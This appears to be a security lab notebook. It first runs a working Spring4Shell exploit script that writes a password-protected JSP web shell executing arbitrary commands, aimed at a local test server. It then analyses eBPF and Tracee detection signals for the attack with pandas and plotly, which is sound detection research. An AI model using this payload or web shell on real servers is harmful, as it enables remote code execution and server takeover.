#! /usr/bin/env python3
#coding:utf-8
import requests
import argparse
import urllib3
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
from urllib.parse import urljoin,urlparse
from threading import Thread
from sys import exit
def run(url):
headers = {
"suffix": "%>//",
"c1": "Runtime",
"c2": "<%",
"DNT": "1",
"Content-Type": "application/x-www-form-urlencoded",
}
data = "class.module.classLoader.resources.context.parent.pipeline.first.pattern=%25%7Bc2%7Di%20if(%22j%22.equals(request.getParameter(%22pwd%22)))%7B%20java.io.InputStream%20in%20%3D%20%25%7Bc1%7Di.getRuntime().exec(request.getParameter(%22cmd%22)).getInputStream()%3B%20int%20a%20%3D%20-1%3B%20byte%5B%5D%20b%20%3D%20new%20byte%5B2048%5D%3B%20while((a%3Din.read(b))!%3D-1)%7B%20out.println(new%20String(b))%3B%20%7D%20%7D%20%25%7Bsuffix%7Di&class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp&class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT&class.module.classLoader.resources.context.parent.pipeline.first.prefix=tomcatwar&class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat="
try:
requests.post(url,
headers=headers,
data=data,
timeout=15,
allow_redirects=False,
verify=False)
shellurl = urljoin(url, 'tomcatwar.jsp')
shellgo = requests.get(shellurl,
timeout=15,
allow_redirects=False,
stream=True,
verify=False)
if shellgo.status_code == 200:
print(f"Vulnerable,shell ip:{shellurl}?pwd=j&cmd=ifconfig")
## Depending on the server, the shell url may be in tomcats root folder
else:
parsedurl = urlparse(shellurl)
rooturl = parsedurl.scheme+"://"+parsedurl.netloc # There is 100% a better way to do this, please make a PR if you know!
shellurlroot = urljoin(rooturl, 'tomcatwar.jsp')
shellgoroot = requests.get(shellurlroot,
timeout=15,
allow_redirects=False,
stream=True,
verify=False)
if shellgoroot.status_code == 200:
print(f"Vulnerable,shell ip:{shellurlroot}?pwd=j&cmd=whoami")
else:
print(f"\033[91m[" + '\u2718' + "]\033[0m", url,
"\033[91mNot Vulnerable!\033[0m ")
except Exception as e:
print(e)
pass
run("http://192.168.209.128:8080/")
Vulnerable,shell ip:http://192.168.209.128:8080/tomcatwar.jsp?pwd=j&cmd=ifconfig
requests.post("http://192.168.209.128:8080/tomcatwar.jsp?pwd=j&cmd='ls'").content
b'{"timestamp":"2022-04-04T16:18:12.310+00:00","status":500,"error":"Internal Server Error","path":"/tomcatwar.jsp"}'
import pandas as pd
import pandas
# monkeypatch using standard python json module
import json
pd.io.json._json.loads = lambda s, *a, **kw: json.loads(s)
# monkeypatch using faster simplejson module
import simplejson
pd.io.json._json.loads = lambda s, *a, **kw: simplejson.loads(s)
# normalising (unnesting) at the same time (for nested jsons)
pd.io.json._json.loads = lambda s, *a, **kw: pandas.json_normalize(simplejson.loads(s))
import plotly.graph_objects as go
import json
def change_args(x):
s = ""
for i in x:
s+=json.dumps(i)
s+='<br>'
return s
def syscall_timeseires(df, processId, syscall_list=[], process_name=""):
# processId needs to be in list
if process_name:
df = df[df['processName'] == process_name]
df = df[df['processId'].isin(processId)]
df['args_print'] = df['args'].apply(change_args)
if not syscall_list:
syscall_list = list(df['eventName'].unique())
data = []
for sys in syscall_list:
df2 = df[df['eventName'] == sys]
data.append(go.Scatter(name=sys,x=df2['timestamp'],
y=df2['eventName'],
mode='markers',
text=df2['args_print']))
fig = go.Figure(data=data)
fig.update_layout(title='Event Timeseries of {}'.format(process_name))
fig.show()
fig.write_html('graph.html')
import plotly.express as px
def df2freq(df, fields):
return df.groupby(fields, as_index=False).size().sort_values('size', ascending=False)
def parseargs(df):
df['orginal_args'] = df['args']
df = df.explode('args')
df[['name', 'type', 'value']] = df['args'].apply(pd.Series)
df['value'] = df['value'].astype('str')
return df
events = pd.read_json("ebpf_events.json", lines=True)
events.info()
<class 'pandas.core.frame.DataFrame'> RangeIndex: 2492 entries, 0 to 2491 Data columns (total 19 columns): # Column Non-Null Count Dtype --- ------ -------------- ----- 0 timestamp 2492 non-null datetime64[ns] 1 processId 2492 non-null int64 2 threadId 2492 non-null int64 3 parentProcessId 2492 non-null int64 4 hostProcessId 2492 non-null int64 5 hostThreadId 2492 non-null int64 6 hostParentProcessId 2492 non-null int64 7 userId 2492 non-null int64 8 mountNamespace 2492 non-null int64 9 pidNamespace 2492 non-null int64 10 processName 2492 non-null object 11 hostName 2492 non-null object 12 containerId 2492 non-null object 13 eventId 2492 non-null int64 14 eventName 2492 non-null object 15 argsNum 2492 non-null int64 16 returnValue 2492 non-null int64 17 stackAddresses 0 non-null float64 18 args 2492 non-null object dtypes: datetime64[ns](1), float64(1), int64(12), object(5) memory usage: 370.0+ KB
events["timestamp"].hist(bins=30)
<AxesSubplot:>
g_eventName = df2freq(events, 'eventName')
px.pie(g_eventName, values='size', names='eventName')
g_eventName = df2freq(events, 'eventName')
events["beat"] = events["args"].apply(change_args)
events["index"] = events.index
fig = px.scatter(events,x="index",
y="eventName",
title="EventsTimeLine",
color="processName",
hover_data=["timestamp","processId","processName","eventName","beat"]
)
fig
!tail +2 tracee-rules.json > tracee-rules2.json
sigs = pd.read_json("tracee-rules2.json", lines=True)
sigs
| Data.Address | Data.Port | Data.Type | Context.timestamp | Context.processId | Context.threadId | Context.parentProcessId | Context.hostProcessId | Context.hostThreadId | Context.hostParentProcessId | ... | SigMetadata.Name | SigMetadata.Description | SigMetadata.Tags | SigMetadata.Properties.Category | SigMetadata.Properties.Kubernetes_Technique | SigMetadata.Properties.Severity | SigMetadata.Properties.Technique | SigMetadata.Properties.external_id | SigMetadata.Properties.id | Data.Path Name | |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| 0 | 0.0.0.0 | 8080.0 | AF_INET | 1649079002076440304 | 1 | 12 | 19383 | 19404 | 19439 | 19383 | ... | Server listening on network port detected | Server bound and listening on a network port d... | NaN | command-and-control | 0 | Web Protocols | T1071.001 | attack-pattern--df8b2a25-8bdf-4856-953c-a04372... | NaN | |
| 1 | NaN | NaN | NaN | 1649079002191647195 | 1 | 37 | 19383 | 19404 | 19465 | 19383 | ... | New script dropped during runtime on container | A script file was dropped in the system during... | NaN | defense-evasion | 1 | Masquerading | T1036 | attack-pattern--42e8de7b-37b2-4258-905a-689781... | /app/tomcat/webapps/ROOT/org/springframework/b... | |
| 2 | NaN | NaN | NaN | 1649079002192495818 | 1 | 37 | 19383 | 19404 | 19465 | 19383 | ... | New script dropped during runtime on container | A script file was dropped in the system during... | NaN | defense-evasion | 1 | Masquerading | T1036 | attack-pattern--42e8de7b-37b2-4258-905a-689781... | /app/tomcat/webapps/ROOT/org/springframework/b... | |
| 3 | NaN | NaN | NaN | 1649079002193007224 | 1 | 37 | 19383 | 19404 | 19465 | 19383 | ... | New script dropped during runtime on container | A script file was dropped in the system during... | NaN | defense-evasion | 1 | Masquerading | T1036 | attack-pattern--42e8de7b-37b2-4258-905a-689781... | /app/tomcat/webapps/ROOT/org/springframework/b... | |
| 4 | NaN | NaN | NaN | 1649079002193568653 | 1 | 37 | 19383 | 19404 | 19465 | 19383 | ... | New script dropped during runtime on container | A script file was dropped in the system during... | NaN | defense-evasion | 1 | Masquerading | T1036 | attack-pattern--42e8de7b-37b2-4258-905a-689781... | /app/tomcat/webapps/ROOT/org/springframework/b... | |
| ... | ... | ... | ... | ... | ... | ... | ... | ... | ... | ... | ... | ... | ... | ... | ... | ... | ... | ... | ... | ... | ... |
| 83 | NaN | NaN | NaN | 1649079441217011692 | 1 | 41 | 19383 | 19404 | 19472 | 19383 | ... | New script dropped during runtime on container | A script file was dropped in the system during... | NaN | defense-evasion | 1 | Masquerading | T1036 | attack-pattern--42e8de7b-37b2-4258-905a-689781... | /app/tomcat/work/Catalina/localhost/ROOT/org/a... | |
| 84 | NaN | NaN | NaN | 1649079458516293892 | 1 | 43 | 19383 | 19404 | 19474 | 19383 | ... | New script dropped during runtime on container | A script file was dropped in the system during... | NaN | defense-evasion | 1 | Masquerading | T1036 | attack-pattern--42e8de7b-37b2-4258-905a-689781... | /app/tomcat/work/Catalina/localhost/ROOT/org/a... | |
| 85 | NaN | NaN | NaN | 1649079458551105598 | 1 | 43 | 19383 | 19404 | 19474 | 19383 | ... | New script dropped during runtime on container | A script file was dropped in the system during... | NaN | defense-evasion | 1 | Masquerading | T1036 | attack-pattern--42e8de7b-37b2-4258-905a-689781... | /app/tomcat/work/Catalina/localhost/ROOT/org/a... | |
| 86 | NaN | NaN | NaN | 1649079473798850683 | 1 | 46 | 19383 | 19404 | 19477 | 19383 | ... | New script dropped during runtime on container | A script file was dropped in the system during... | NaN | defense-evasion | 1 | Masquerading | T1036 | attack-pattern--42e8de7b-37b2-4258-905a-689781... | /app/tomcat/work/Catalina/localhost/ROOT/org/a... | |
| 87 | NaN | NaN | NaN | 1649079473827587249 | 1 | 46 | 19383 | 19404 | 19477 | 19383 | ... | New script dropped during runtime on container | A script file was dropped in the system during... | NaN | defense-evasion | 1 | Masquerading | T1036 | attack-pattern--42e8de7b-37b2-4258-905a-689781... | /app/tomcat/work/Catalina/localhost/ROOT/org/a... |
88 rows × 34 columns
sigs['index']=sigs.index
[x for x in sigs.keys() if x.startswith("Data")] + []
['Data.Address', 'Data.Port', 'Data.Type', 'Data.Path Name']
fig = px.scatter(sigs,x="index",
y="SigMetadata.Name",
title="Signatures Timeline",
color="Context.processName",
hover_data=[x for x in sigs.keys() if x.startswith("Data")]
)
fig.show()
df2freq(sigs,["SigMetadata.Name","Context.processName"])
| SigMetadata.Name | Context.processName | size | |
|---|---|---|---|
| 1 | New script dropped during runtime on container | localhost-start | 71 |
| 0 | New script dropped during runtime on container | http-nio-8080-e | 14 |
| 3 | Server listening on network port detected | java | 2 |
| 2 | New web script dropped during runtime | ContainerBackgr | 1 |
df2freq(sigs,["Context.processName"])
| Context.processName | size | |
|---|---|---|
| 3 | localhost-start | 71 |
| 1 | http-nio-8080-e | 14 |
| 2 | java | 2 |
| 0 | ContainerBackgr | 1 |
df2freq(sigs,['Data.Path Name'])
| Data.Path Name | size | |
|---|---|---|
| 73 | /app/tomcat/work/Catalina/localhost/ROOT/org/a... | 7 |
| 72 | /app/tomcat/work/Catalina/localhost/ROOT/org/a... | 7 |
| 46 | /app/tomcat/webapps/ROOT/org/springframework/b... | 1 |
| 53 | /app/tomcat/webapps/ROOT/org/springframework/b... | 1 |
| 52 | /app/tomcat/webapps/ROOT/org/springframework/b... | 1 |
| ... | ... | ... |
| 24 | /app/tomcat/webapps/ROOT/org/springframework/b... | 1 |
| 23 | /app/tomcat/webapps/ROOT/org/springframework/b... | 1 |
| 22 | /app/tomcat/webapps/ROOT/org/springframework/b... | 1 |
| 21 | /app/tomcat/webapps/ROOT/org/springframework/b... | 1 |
| 37 | /app/tomcat/webapps/ROOT/org/springframework/b... | 1 |
74 rows × 2 columns
# Try to Alert